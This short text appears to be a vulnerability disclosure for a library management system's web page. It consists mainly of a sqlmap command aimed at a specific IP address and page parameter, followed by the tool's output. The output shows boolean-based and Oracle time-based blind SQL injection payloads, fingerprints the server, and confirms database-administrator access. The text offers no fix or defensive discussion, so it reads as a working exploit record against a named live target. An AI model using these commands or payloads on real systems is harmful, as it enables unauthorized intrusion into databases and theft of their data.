SQL injection in a general-purpose library management system: one of its pages is vulnerable to SQL injection.
sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 --is-dba
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=123 AND 7478=7478
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ID=123 AND 9273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(111)||CHR(105)||CHR(98),5)
---
[11:34:18] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[11:34:18] [INFO] testing if current user is DBA
current user is DBA: True
[11:34:25] [INFO]